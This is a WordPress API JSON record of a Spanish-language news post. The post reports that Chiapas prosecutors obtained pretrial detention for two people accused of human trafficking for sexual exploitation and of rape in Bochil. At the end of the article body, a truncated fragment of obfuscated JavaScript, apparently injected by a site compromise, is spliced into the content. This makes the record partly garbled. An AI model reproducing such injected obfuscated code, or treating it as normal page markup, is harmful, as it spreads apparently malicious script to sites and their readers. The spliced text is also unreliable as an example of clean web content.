{"id":449,"date":"2022-03-10T21:10:57","date_gmt":"2022-03-10T21:10:57","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=449"},"modified":"2022-03-11T20:35:06","modified_gmt":"2022-03-11T20:35:06","slug":"fge-logra-vinculacion-a-proceso-por-trata-de-personas-y-violacion-en-bochil","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=449","title":{"rendered":"FGE logra vinculaci\u00f3n a proceso por Trata de Personas y Violaci\u00f3n en Bochil"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"960\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1646946535056.jpg\" alt=\"\" class=\"wp-image-450\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1646946535056.jpg 960w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1646946535056-300x300.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1646946535056-150x150.jpg 150w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1646946535056-768x768.jpg 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p>Oficial <\/p>\n\n\n\n<p>Tuxtla Guti\u00e9rrez, Chiapas 10  Marzo 2022.- La Fiscal\u00eda General del Estado (FGE) a trav\u00e9s de la Fiscal\u00eda contra la Trata de Personas, obtuvo Vinculaci\u00f3n a Proceso en contra de dos personas, por los delitos de Trata de Personas, en la modalidad de recibir y alojar a una persona con fines de explotaci\u00f3n sexual y Violaci\u00f3n, hechos ocurridos en el municipio de Bochil.Al valorar las pruebas aportadas por el Fiscal del Ministerio P\u00fablico Investigador, adscrito a la Fiscal\u00eda contra la Trata de Personas, y tras comprobar la probable responsabilidad de los hoy imputados, el Juez de Control, Regi\u00f3n Dos, en el municipio de San Crist\u00f3bal de Las Casas, resolvi\u00f3 vincular a proceso a Ana Isabel \u201cN\u201d, y Jos\u00e9 Manuel \u201cN\u201d; la primera por el delito de Trata de Personas, en la modalidad de recibir y alojar a una persona con fines de explotaci\u00f3n sexual, y el segundo, por Violaci\u00f3n, ambos il\u00edcitos en agravio de una v\u00edctima de identidad protegida.El Juez de Control dict\u00f3 prisi\u00f3n preventiva a los referidos imputados, por lo que permanecer\u00e1n recluidos en el Centro Estatal de Reinserci\u00f3n Social para Sentenciados (CERSS) n\u00famero 5, en San Crist\u00f3bal de las Casas, donde enfrentar\u00e1n el proceso penal correspondiente.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Oficial Tuxtla Guti\u00e9rrez, Chiapas 10 Marzo 2022.- La Fiscal\u00eda General del Estado (FGE) a trav\u00e9s de la Fiscal\u00eda contra la Trata de Personas, obtuvo Vinculaci\u00f3n a Proceso en contra de dos personas, por los delitos de Trata de Personas, en la modalidad de recibir y alojar a una persona con fines de explotaci\u00f3n sexual y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":450,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[17,4],"tags":[],"class_list":["post-449","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-portada","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/449","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=449"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/449\/revisions"}],"predecessor-version":[{"id":451,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/449\/revisions\/451"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/450"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=449"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=449"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=449"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}